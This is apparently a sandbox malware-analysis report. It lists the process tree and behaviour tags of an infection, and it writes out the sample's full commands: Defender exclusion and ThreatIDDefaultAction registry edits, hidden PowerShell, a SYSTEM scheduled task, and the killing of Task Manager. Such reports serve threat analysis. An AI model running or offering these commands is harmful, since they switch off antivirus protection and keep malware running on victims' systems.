Bl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA4⤵
- UAC bypass
- Windows security bypass
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\the.exe" -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6040
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"5⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
PID:6200 -
C:\Users\Admin\Pictures\qjnar5mhQPzpks9OpNlu8jqr.exe"C:\Users\Admin\Pictures\qjnar5mhQPzpks9OpNlu8jqr.exe" /s6⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
C:\Users\Admin\Pictures\pKObCuHpjwoZZM8nL5N17RI3.exe"C:\Users\Admin\Pictures\pKObCuHpjwoZZM8nL5N17RI3.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4912 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"7⤵PID:6060
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"7⤵PID:2548
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4772 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"8⤵PID:3328
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"7⤵PID:5256
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"7⤵PID:1120
-
-
-
C:\Users\Admin\Pictures\0ED8kn5cnmOyeZv2DQ8eB5il.exe"C:\Users\Admin\Pictures\0ED8kn5cnmOyeZv2DQ8eB5il.exe"6⤵
- Modifies firewall policy service
- Windows security bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7060
-
-
C:\Users\Admin\Pictures\dkFVZlmtLqTxxrtOi9FElXnO.exe"C:\Users\Admin\Pictures\dkFVZlmtLqTxxrtOi9FElXnO.exe"6⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2652
-
-
C:\Users\Admin\Pictures\eLOyJkYRBZrXsLNa5scWY7nr.exe"C:\Users\Admin\Pictures\eLOyJkYRBZrXsLNa5scWY7nr.exe"6⤵
- Executes dropped EXE
PID:6024 -
C:\Users\Admin\AppData\Local\Temp\7zSD5BA.tmp\Install.exe.\Install.exe7⤵
- Executes dropped EXE
PID:6568 -
C:\Users\Admin\AppData\Local\Temp\7zSD983.tmp\Install.exe.\Install.exe /NQHxdidUQs "385118" /S8⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
PID:6452 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"9⤵PID:6932
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"10⤵PID:5500
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 611⤵PID:1208
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 612⤵PID:3400
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"10⤵PID:904
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 611⤵PID:5424
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 612⤵PID:6440
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"10⤵PID:6952
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 611⤵PID:7160
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 612⤵PID:6476
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"10⤵PID:6416
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 611⤵PID:2824
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 612⤵PID:3128
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"10⤵PID:2792
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force11⤵PID:1168
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3612 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force13⤵PID:2068
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"9⤵PID:4536
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵PID:1532
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5624 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True12⤵
- Suspicious use of AdjustPrivilegeToken
PID:5096
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bqGGCwwWIommTRgeuN" /SC once /ST 02:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSD983.tmp\Install.exe\" 1g /qbjdidxEEJ 385118 /S" /V1 /F9⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4476
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bqGGCwwWIommTRgeuN"9⤵PID:6684
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bqGGCwwWIommTRgeuN10⤵PID:6748
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bqGGCwwWIommTRgeuN11⤵PID:6416
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6452 -s 10409⤵
- Program crash
PID:5188
-
-
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"5⤵PID:1068
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6848
-
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\wimloader.dllwimloader.dll3⤵
- Executes dropped EXE
PID:5788 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_3351c0a4-4a78-48aa-be99-5fd2463ba799\caller.cmd" "4⤵PID:5676
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5656
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5232
-
C:\Windows\system32\efsui.exeefsui.exe /efs /keybackup1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5972 -ip 59721⤵PID:6448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:5324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2148
-
C:\Users\Admin\AppData\Local\Temp\7zSD983.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSD983.tmp\Install.exe 1g /qbjdidxEEJ 385118 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3900 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:6132
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:2660
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:5640
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:3836
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:2072
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:6508
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:6516
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:3408
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:1092
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:6036
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:5032
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:5188
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:4928
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1524
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:6424
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6056 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:4624
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1260 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:1412
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:5860
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:6980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:3660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:2592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:6932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:3632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:7076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:6136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:5148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:1984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:7164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:6848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:5692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:4148
-
-
